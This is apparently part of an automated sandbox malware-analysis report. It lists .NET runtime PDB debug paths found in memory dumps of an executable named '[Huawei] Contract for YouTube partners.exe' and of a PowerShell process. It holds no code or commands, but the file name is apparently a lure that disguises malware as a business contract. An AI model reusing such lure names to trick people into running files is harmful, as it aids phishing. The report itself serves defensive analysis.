Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249620096.000002B7E95D0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249669770.000002B7E9601000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Drawing.Common/Release/net8.0/System.Drawing.Common.pdbSHA256 source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251017895.000002B7E9F11000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250944802.000002B7E9E90000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Linq.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249620096.000002B7E95D0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249669770.000002B7E9601000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248252782.000002B7E8F30000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246966709.000002B7E60C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.ComponentModel.EventBasedAsync.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251136685.000002B7E9FB0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251111684.000002B7E9FA1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.DataContractSerialization.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Collections.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249143432.000002B7E9341000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249169651.000002B7E9360000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Private.CoreLib.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdbSHA256 source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250716435.000002B7E9DC1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250642336.000002B7E9D70000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Loader\Release\net8.0\System.Runtime.Loader.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249503089.000002B7E9590000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249428276.000002B7E9571000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Uri\Release\net8.0\System.Private.Uri.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248471233.000002B7E8FD0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248337268.000002B7E8F51000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net8.0-windows\System.Net.Primitives.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248225564.000002B7E8F11000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248179022.000002B7E8EF0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Private.Xml.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249795196.000002B7E9680000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250073254.000002B7E9981000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Collections.Specialized.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250803085.000002B7E9E20000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250777948.000002B7E9E11000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.ReaderWriter\Release\net8.0\System.Xml.ReaderWriter.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249194705.000002B7E9380000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248294715.000002B7E8F41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Quic\Release\net8.0-windows\System.Net.Quic.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251604593.000002B7EA231000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251630855.000002B7EA250000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249567499.000002B7E95B1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249594148.000002B7E95C0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Runtime.Serialization.Primitives.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249474322.000002B7E9581000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249525013.000002B7E95A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246009062.00000277513F1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246783735.000002B7E5F50000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdbSHA256 source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250591766.000002B7E9D51000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250619026.000002B7E9D60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Claims.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Text.RegularExpressions.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250422129.000002B7E9C80000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250523289.000002B7E9CE1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.ReaderWriter\Release\net8.0\System.Xml.ReaderWriter.pdbSHA256 source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249194705.000002B7E9380000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248294715.000002B7E8F41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdbSHA256 source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249474322.000002B7E9581000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249525013.000002B7E95A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net8.0\System.Memory.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251506804.000002B7EA1F1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251529668.000002B7EA200000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.NameResolution.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249010025.000002B7E9301000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249032962.000002B7E9310000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.pdbhP source: powershell.exe, 00000004.00000002.2198121281.00000224016FA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Claims\Release\net8.0\System.Security.Claims.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.pdb source: powershell.exe, 00000004.00000002.2198121281.00000224016FA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Net.Quic.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251604593.000002B7EA231000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251630855.000002B7EA250000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248367252.000002B7E8F70000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248436550.000002B7E8FA1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Threading.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246009062.00000277513F1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246783735.000002B7E5F50000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245924097.00000277513D0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245901626.00000277513C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/Microsoft.Win32.SystemEvents/Release/net8.0-windows/Microsoft.Win32.SystemEvents.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250920794.000002B7E9E81000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251066988.000002B7E9F90000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.ServicePoint.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251180696.000002B7E9FD1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251365686.000002B7EA1A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.EventBasedAsync\Release\net8.0\System.ComponentModel.EventBasedAsync.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251136685.000002B7E9FB0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251111684.000002B7E9FA1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Specialized\Release\net8.0\System.Collections.Specialized.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250803085.000002B7E9E20000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250777948.000002B7E9E11000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Drawing.Primitives.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250876793.000002B7E9E70000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250853000.000002B7E9E51000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Collections.Concurrent.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248611872.000002B7E90A0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248658900.000002B7E90C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.FileSystem.DriveInfo\Release\net8.0-windows\System.IO.FileSystem.DriveInfo.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245966712.00000277513E1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246764040.000002B7E5F40000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Windows.Forms.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251680767.000002B7EA330000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3252368079.000002B7EA9E1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Diagnostics.Process.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245701128.0000027751321000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245657663.00000277512F0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245605245.00000277512E0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245583929.00000277512D1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.Uri.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248471233.000002B7E8FD0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248337268.000002B7E8F51000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Windows.Forms.Primitives/Release/net8.0/System.Windows.Forms.Primitives.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3253245076.000002B7EB261000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3253056950.000002B7EB090000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net8.0\System.Collections.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249143432.000002B7E9341000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249169651.000002B7E9360000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249474322.000002B7E9581000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249525013.000002B7E95A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Console\Release\net8.0-windows\System.Console.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246850829.000002B7E5F90000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246824918.000002B7E5F71000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141674897.00007FF77A3F8000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Registry\Release\net8.0-windows\Microsoft.Win32.Registry.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3244830292.000002774F971000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249770533.000002B7E9660000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248367252.000002B7E8F70000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248436550.000002B7E8FA1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdbSHA256Y$ source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248122759.000002B7E8E40000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246893106.000002B7E6011000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Collections.NonGeneric.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251410435.000002B7EA1B1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251433635.000002B7EA1C0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245701128.0000027751321000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245657663.00000277512F0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248708035.000002B7E90E1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248730109.000002B7E90F0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Memory.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251506804.000002B7EA1F1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251529668.000002B7EA200000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248496144.000002B7E8FF0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3244705711.000002774F921000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\Release\net8.0\System.Reflection.Primitives.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249747447.000002B7E9640000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249726194.000002B7E9631000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249101985.000002B7E9330000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249078164.000002B7E9321000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Private.Windows.Core/Release/net8.0/System.Private.Windows.Core.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251295916.000002B7EA0C1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251204268.000002B7E9FE0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248518064.000002B7E9000000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248575013.000002B7E9051000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdbSHA256}yx source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251180696.000002B7E9FD1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251365686.000002B7EA1A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Cryptography.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248833493.000002B7E91C1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248750883.000002B7E9100000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Runtime.InteropServices.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245924097.00000277513D0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245901626.00000277513C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Private.DataContractSerialization/Release/net8.0/System.Private.DataContractSerialization.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248122759.000002B7E8E40000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246893106.000002B7E6011000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdbSHA256 source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249567499.000002B7E95B1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249594148.000002B7E95C0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdbSHA256b' source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248367252.000002B7E8F70000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248436550.000002B7E8FA1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245605245.00000277512E0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245583929.00000277512D1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdbSHA256 source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249620096.000002B7E95D0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249669770.000002B7E9601000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Windows.Forms/Release/net8.0/System.Windows.Forms.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251680767.000002B7EA330000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3252368079.000002B7EA9E1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdbSHA256M source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249101985.000002B7E9330000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249078164.000002B7E9321000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Console.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246850829.000002B7E5F90000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246824918.000002B7E5F71000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Sockets\Release\net8.0-windows\System.Net.Sockets.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248897242.000002B7E9280000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248955580.000002B7E92C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.Http.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248122759.000002B7E8E40000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246893106.000002B7E6011000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245331226.0000027751290000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3244925040.000002774F991000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251180696.000002B7E9FD1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251365686.000002B7EA1A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.RegularExpressions\Release\net8.0\System.Text.RegularExpressions.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250422129.000002B7E9C80000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250523289.000002B7E9CE1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Drawing.Primitives\Release\net8.0-windows\System.Drawing.Primitives.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250876793.000002B7E9E70000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250853000.000002B7E9E51000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Principal.Windows\Release\net8.0-windows\System.Security.Principal.Windows.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245786403.0000027751380000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245744128.0000027751351000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.Primitives.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248225564.000002B7E8F11000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248179022.000002B7E8EF0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdbSHA256iEc source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248708035.000002B7E90E1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248730109.000002B7E90F0000.00000004.10000000.00040000.00000000.sdmp
